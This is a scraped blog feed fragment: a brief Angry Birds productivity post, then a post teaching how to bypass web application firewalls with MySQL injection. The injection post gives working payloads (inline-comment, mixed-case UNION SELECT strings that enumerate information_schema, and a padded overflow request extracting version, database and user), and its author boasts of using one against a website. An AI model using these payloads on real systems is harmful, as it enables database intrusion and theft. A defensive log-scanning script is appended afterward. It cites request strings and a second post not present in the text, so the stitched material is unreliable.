</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-52014728375496465712011-09-15T00:08:00.000-07:002011-09-15T00:17:34.562-07:00Angry Birds Costing Businesses $1.5 Billion In Lost WagesThe world's love of <span style="font-weight: bold;">Angry Birds</span> could be costing businesses over $1.5 billion in lost wages, according to an estimate from Alexis Madrigal of the Atlantic.<br /><br />Madrigal looked at the methodology used to calculate things like how much money companies lose when productivity slows thanks to the NCAA tournament, or 
how much money is lost thanks to our obsession with fantasy football.<br /><br />From there he came up with his estimate, which is laid out in the graphic below. He admits the math could be a little fuzzy, but says, "I bet this estimate is right to the order of magnitude, if not in the details."<br /><br />Frankly, we think these sorts of things are bogus. Productivity isn't lost. People just do what they do. But, it's sort of fun to play with numbers.<br /><br /><a href="http://static7.businessinsider.com/image/4e709d0a6bb3f7eb79000033/angry-birds.jpg"><img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 620px; height: 436px;" src="http://static7.businessinsider.com/image/4e709d0a6bb3f7eb79000033/angry-birds.jpg" alt="" border="0" /></a><br /><br />sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-42727800267395923972011-09-12T23:05:00.000-07:002011-10-25T01:21:43.390-07:00<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="line-height: normal;">
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;">MySQL injection with Bypassing WAF:</span></u></i></b><br />
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;"><br /></span></u></i></b><br />
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;">Comments:</span></u></i></b></div>
<div class="MsoNormal" style="line-height: normal;">
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;"><br /></span></u></i></b><b><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;"></span></b></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">SQL
comments are a blessing to us SQL injectors. They allow us to bypass a lot of
the restrictions of Web application firewalls and to kill certain SQL
statements, so that the attacker's commands execute while the actual
legitimate query is commented out. Some comments in SQL:</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">//, -- ,
/**/, #, --+, -- -, ;</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;">Case
Changing:</span></u></i></b><b><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;"></span></b></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Some WAFs filter keywords with patterns like /union\select/ig. We can bypass this
filter by using inline comments most of the time; more complex cases will
require a more advanced approach, like adding SQL keywords that further
separate the two words:</span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">id=1/*!UnIoN*/SeLeCT</span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Take
notice of the exclamation point in /*!code*/: MySQL executes the code inside
such a comment, where other servers would treat it as an ordinary comment.</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"><br />
Inline comments can be used throughout
the SQL statement, so if table_name or information_schema are filtered we can
add more inline comments. For example:</span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">id=1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM
/*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/=database()-- -</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">This
bypass above works. I myself just used this against a Web site recently. </span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<b><i><u><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;">Buffer
Overflow / Unexpected input:</span></u></i></b><b><span style="font-family: 'Times New Roman', serif; font-size: 13.5pt;"></span></b></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">A lot of
WAFs are written in the C language, making them prone to overflows or to acting
differently when loaded with a lot of data. Here is a WAF that does its job
correctly, but when given a large amount of data allows the malicious request
and response.</span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">id=1 and
(select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more
A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26<br />
,27,28,29,30,31,32,33,34,35,36--+</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span></div>
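<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">From the defender's side, the two posts above show why a WAF rule that looks for the literal sequence union&lt;space&gt;select is not enough: the same query arrives percent-encoded, with + for spaces, in mixed case, or split by /*! */ comments. As an added example (not code from the original posts), the Python below scans constructed Apache-style access log lines, including the two request strings quoted in the posts, first with such a naive rule and then after undoing those encodings, so the comparison shows what the normalization step buys:</span></div>

```python
import re
from urllib.parse import unquote_plus

# Constructed access log lines (Apache combined format, trimmed). Lines 2 and 3
# carry the two request strings quoted in the posts above; 1 and 4 are benign.
ACCESS_LOG = """\
10.0.0.1 - - [12/Sep/2011:23:05:00 -0700] "GET /news.php?id=5 HTTP/1.1" 200 512
10.0.0.2 - - [12/Sep/2011:23:05:01 -0700] "GET /news.php?id=5%20union%20all%20select%201,2,3/* HTTP/1.1" 200 612
10.0.0.3 - - [12/Sep/2011:23:05:02 -0700] "GET /news.php?id=1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM+/*information_schema*/.tables+/*!WHERE+*/+/*!TaBlE_ScHeMa*/=database()--+- HTTP/1.1" 200 700
10.0.0.4 - - [12/Sep/2011:23:05:03 -0700] "GET /search.php?q=union+station HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# The kind of rule the WAF post describes: one pattern applied to the decoded
# parameter, expecting the keywords to be separated by plain whitespace.
NAIVE_RULE = re.compile(r"union\s+(?:all\s+)?select", re.IGNORECASE)

# Signatures applied to the normalized form instead.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "fingerprint": re.compile(r"@@version|\bversion\s*\(|\bdatabase\s*\("),
}

COMMENT_DELIMS = re.compile(r"/\*!?|\*/")   # matches /*, /*! and */
WHITESPACE = re.compile(r"\s+")


def url_decode(text, rounds=3):
    """Percent-decode and turn + into spaces, repeating for double encoding."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def normalize(query_string):
    """Undo the obfuscations from the WAF-bypass post before matching.

    Comment delimiters become spaces, so /*!UnIoN*/SeLeCT reads as
    'union select' and so does union/**/select; case is folded and runs
    of whitespace are collapsed.
    """
    text = url_decode(query_string)
    text = COMMENT_DELIMS.sub(" ", text)
    text = WHITESPACE.sub(" ", text)
    return text.strip().lower()


def query_string_of(log_line):
    """Extract the query string from the request line, or '' if there is none."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return ""
    return match.group(1).partition("?")[2]


def naive_hit(query_string):
    """What the single-regex WAF rule would decide for this request."""
    return bool(NAIVE_RULE.search(url_decode(query_string)))


def classify(query_string):
    """Names of the signatures that fire on the normalized query string."""
    text = normalize(query_string)
    return sorted(name for name, rule in SIGNATURES.items() if rule.search(text))


def scan(log_text):
    """Return (client_ip, naive_hit, normalized_hits) for each log line."""
    results = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip = line.split(" ", 1)[0]
        qs = query_string_of(line)
        results.append((ip, naive_hit(qs), classify(qs)))
    return results


if __name__ == "__main__":
    for ip, naive, hits in scan(ACCESS_LOG):
        print(f"{ip:10} naive={naive!s:5} normalized={hits}")
```

The naive rule catches the percent-encoded request but misses the inline-comment one entirely; after normalization the second request also trips the information_schema and database() signatures, while the innocent "union station" search stays clean.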
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0